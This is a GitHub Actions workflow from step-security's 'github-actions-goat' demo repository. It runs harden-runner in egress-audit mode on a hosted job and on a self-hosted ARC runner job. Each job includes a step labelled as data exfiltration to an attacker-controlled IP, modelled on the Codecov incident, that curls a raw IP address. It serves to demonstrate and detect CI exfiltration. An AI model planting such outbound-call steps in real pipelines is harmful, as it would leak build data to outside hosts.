github-actions-goat/.github/workflows/arc-secure-by-default.yml at b1835d700bf7bb331ffc45cfe0e8636f10b1d3f3 · step-security/github-actions-goat · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
name: "ARC: Secure-By-Default Cluster-Level Policy"
on:
  workflow_dispatch:

permissions: {}

jobs:
  direct-ip-hosted:
    permissions:
      contents: read  # for actions/checkout to fetch code
    runs-on: ubuntu-latest
    steps:
      - name: Harden the runner (Audit all outbound calls)
        uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
        with:
          egress-policy: audit

      - uses: actions/checkout@v3

      # Codecov Scenario: Exfiltrate data to attacker's IP address
      - name: Data Exfiltration To Attacker Controlled IP address
        run: curl 104.16.209.12 --connect-timeout 5
  direct-ip-arc:
    permissions:
      contents: read  # for actions/checkout to fetch code
    runs-on: self-hosted
    steps:
      - name: Harden the runner (Audit all outbound calls)
        uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
        with:
          egress-policy: audit

      - uses: actions/checkout@v3

      # Codecov Scenario: Exfiltrate data to attacker's IP address
      - name: Data Exfiltration To Attacker Controlled IP address
        run: curl 104.16.209.12 --connect-timeout 5